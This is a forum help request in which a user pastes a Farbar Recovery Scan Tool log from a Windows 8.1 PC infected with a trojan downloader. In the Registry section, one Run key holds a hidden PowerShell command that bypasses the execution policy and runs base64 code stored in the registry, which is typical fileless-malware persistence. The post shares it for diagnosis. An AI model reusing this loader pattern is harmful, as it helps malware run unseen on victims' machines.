BleepingComputer.com forums
Infected with win64/trojandownloader.wauchos


This topic is locked
4 replies to this topic

#1 J2M-CJBE
Members, 6 posts, OFFLINE

Posted 01 December 2016 - 01:34 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016
Ran by Ptr. Julius Lampao (administrator) on PASTOR (02-12-2016 01:55:44)
Running from C:\Users\Ptr. Julius Lampao\Downloads\Programs
Loaded Profiles: Ptr. Julius Lampao (Available Profiles: Ptr. Julius Lampao)
Platform: Windows 8.1 (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
() C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
() C:\Program Files (x86)\HPDef\HomePageDefSrv.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIN2E.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Tonec Inc.) C:\Program Files (x86)\Tonec\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Tonec\IEMonitor.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [] => [X]
HKLM\...\Run: [TSSSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSSSrv.exe [296008 2013-10-22] (TOSHIBA Corporation)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [179040 2013-10-16] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [354144 2013-08-14] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2556768 2013-10-09] (TOSHIBA Corporation)
HKLM\...\Run: [TNOD UP] => C:\Program Files\TNod User & Password Finder\TNODUP.exe [5592576 2015-12-20] (Tukero[X]Team)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2710856 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [Corel Update Helper] => c:\Program Files\Corel\Corel VideoStudio X9\pua.exe [2012104 2016-03-01] (Corel Corporation)
HKLM-x32\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [383768 2002-04-13] (Alcor Micro Corp.)
HKLM-x32\...\Run: [1.TPUReg] => C:\Program Files (x86)\TOSHIBA\PasswordUtility\readLM.exe [2216800 2013-03-28] (TOSHIBA)
HKLM-x32\...\Run: [TSVU] => c:\Program Files\TOSHIBA\TOSHIBA Smart View Utility\TosSmartViewLauncher.exe [516512 2013-07-23] (TOSHIBA)
HKLM-x32\...\Run: [EaseUS EPM tray] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 9.2.2\bin\EpmNews.exe [2081792 2013-03-29] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-30] (Oracle Corporation)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [218896 2016-09-13] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [E09AXLRD_952483187] => C:\Program Files (x86)\Microsoft Encarta\Encarta Premium DVD 2009\EDICT.EXE [351000 2008-06-01] (Microsoft Corporation)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [{C3BD8F3E-7B27-4B7D-BBAD-B7A84FD1BB4B}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\OojMMNdiocWAVsyTshnwAcJXmY').HDUVWDW (the data entry has 22 more characters).
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIN2E.EXE [298560 2014-03-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [IDMan] => C:\Program Files (x86)\Tonec\IDMan.exe [3907152 2015-07-07] (Tonec Inc.)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Run: [Viber] => C:\Users\Ptr. Julius Lampao\AppData\Local\Viber\Viber.exe [45518928 2016-11-18] (Viber Media S.à r.l.)
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {18e4faf5-c27a-11e4-8268-202564357a82} - "D:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {2d69a757-5bc8-11e6-85e6-202564357a82} - "E:\Setup.exe" /s
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {323534f9-6d01-11e5-832b-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {3bcedd81-8c22-11e5-83d7-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ff1f-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ff7c-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {5099ffe4-8738-11e5-83ba-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {6b618252-6672-11e5-8305-202564357a82} - "E:\Setup.exe" /s
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {70d980af-29c0-11e5-827a-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {754f533b-ef3d-11e5-85c4-202564357a82} - "E:\.\ShowModem.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {9fef62a6-9ea1-11e5-8445-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {a13b23e7-9d0c-11e5-8439-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {b4c31913-9df2-11e5-843f-202564357a82} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\MountPoints2: {ed5b73f1-7fd7-11e4-825d-202564357a82} - "E:\AutoRun.exe" 
IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\shareit.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\tecoresident.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\toshibaservicestation.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\tpchviewer.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\wampmanager.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Tonec\IDMShellExt64.dll [2014-04-21] (Tonec Inc.)
Startup: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Canon IJ Status Monitor Canon iP2700 series.lnk [2016-02-29]
ShortcutTarget: Canon IJ Status Monitor Canon iP2700 series.lnk -> C:\Users\PTR~1.JUL\CNMSSC~1.DLL,SMStarterEntryPoint USB001;Canon iP2700 series;cnmss Canon iP2700 series (Local).dll;Canon IJ Status Monitor Canon iP2700 series.lnk (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.6.29 192.168.6.29
Tcpip\..\Interfaces\{5457DDFE-6CCD-4749-945C-93B0DA455B6B}: [DhcpNameServer] 192.168.168.1
Tcpip\..\Interfaces\{70B16E01-C289-4890-8FD5-0C0DC58BA268}: [DhcpNameServer] 192.168.6.29 192.168.6.29
 
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://toshiba13.msn.com/?pc=TAJB
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://toshiba13.msn.com/?pc=TAJB
HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://toshiba13.msn.com/?pc=TAJB
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Tonec\IDMIECC64.dll [2015-07-08] (Internet Download Manager, Tonec Inc.)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2015-08-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_73\bin\ssv.dll [2016-02-11] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-11] (Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Tonec\IDMIECC.dll [2015-07-08] (Internet Download Manager, Tonec Inc.)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2015-08-12] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-11] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2015-07-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-11] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Ptr. Julius Lampao\AppData\Roaming\Mozilla\Firefox\Profiles\6xa2s449.default-1466826215296 [2016-11-30]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc7 [2016-11-05] [not signed]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM\idmmzcc5 [2016-11-05] [not signed]
FF HKU\S-1-5-21-1061507693-3713582409-3664479191-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Tonec\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Tonec\idmmzcc2.xpi [2015-07-15] [not signed]
FF Plugin: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-11] (Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL [2010-02-05] (CANON INC.)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-08-12] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-21] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-07-13] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-08-12] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default [2016-12-02]
CHR Extension: (Data Compression Proxy) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajfiodhbiellfpcjjedhmmmpeeaebmep [2016-05-05]
CHR Extension: (Google Drive) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-30]
CHR Extension: (YouTube) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-30]
CHR Extension: (Google Search) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-30]
CHR Extension: (MK Instagram Downloader) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\dodjaekpogacdaoikfhjfjooeglmgpkp [2016-06-06]
CHR Extension: (Who Deleted Me) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\eiepnnbjenknnjgabbodaihlnkkpkgll [2016-11-17]
CHR Extension: (KProxy Extension) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdocgbfmddcfnlnpmnghmjicjognhonm [2016-11-19]
CHR Extension: (Cut the Rope) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkddaofiamhgfjmaccfcfpfolpgbeomj [2016-08-25]
CHR Extension: (Pinterest Save Button) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2016-11-01]
CHR Extension: (NetBeans Connector) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\hafdlehgocfcodbgjnpecfajgkeejnaa [2015-11-23]
CHR Extension: (Blocky Sniper) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-11-28]
CHR Extension: (Grammarly for Chrome) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2016-11-26]
CHR Extension: (Skype) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-21]
CHR Extension: (Google Keep Chrome Extension) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpcaedmchfhocbbapmcbpinfpgnhiddi [2016-11-22]
CHR Extension: (KProxy Background App) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\maicibfoihmlppibfkljeljefamfndbp [2016-11-19]
CHR Extension: (Cut the Rope Time Travel) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\mobpckplhphcfdikfajajihmljhlmkod [2016-08-25]
CHR Extension: (IDM Integration Module) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-11-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Gmail) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-30]
CHR Extension: (Chrome Media Router) - C:\Users\Ptr. Julius Lampao\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-27]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Tonec\IDMGCExt.crx [2015-07-15]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-05-25]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Tonec\IDMGCExt.crx [2015-07-15]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-10-01] (Windows ® Win 7 DDK provider) [File not signed]
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1149712 2016-09-13] (AVG Technologies CZ, s.r.o.)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2770312 2016-11-30] (ESET)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
S4 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [235008 2013-07-17] (TODO: <Company name>) [File not signed]
S4 GFNEXSrv; C:\Program Files (x86)\TOSHIBA\PasswordUtility\GFNEXSrv.exe [163168 2013-03-28] ()
S2 Globe Tattoo Broadband. RunOuc; C:\Program Files (x86)\Globe Tattoo Broadband\UpdateDog\ouc.exe [218624 2015-11-10] () [File not signed]
R2 HPDef Service; C:\Program Files (x86)\HPDef\HomePageDefSrv.exe [331944 2016-05-21] ()
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
S4 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140936 2013-05-15] ()
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-02] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-02] (Intel® Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
S4 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
S4 THAccelSvc; C:\Program Files\TOSHIBA\HDD Accelerator\THAccelSvc.exe [216976 2013-10-18] (TOSHIBA CORPORATION)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4788496 2016-11-02] (AVG Technologies CZ, s.r.o.)
S4 wampapache; c:\wamp\bin\apache\apache2.4.9\bin\httpd.exe [22016 2014-05-02] (Apache Software Foundation) [File not signed]
S4 wampmysqld; c:\wamp\bin\mysql\mysql5.6.17\bin\mysqld.exe [10959360 2014-05-02] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [348392 2013-10-31] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2013-10-31] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 athr; C:\WINDOWS\system32\DRIVERS\athwbx.sys [3855872 2013-09-25] (Qualcomm Atheros Communications, Inc.)
R3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [40152 2013-09-09] (Broadcom Corporation.)
R3 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [262792 2016-11-30] (ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [199304 2016-11-30] (ESET)
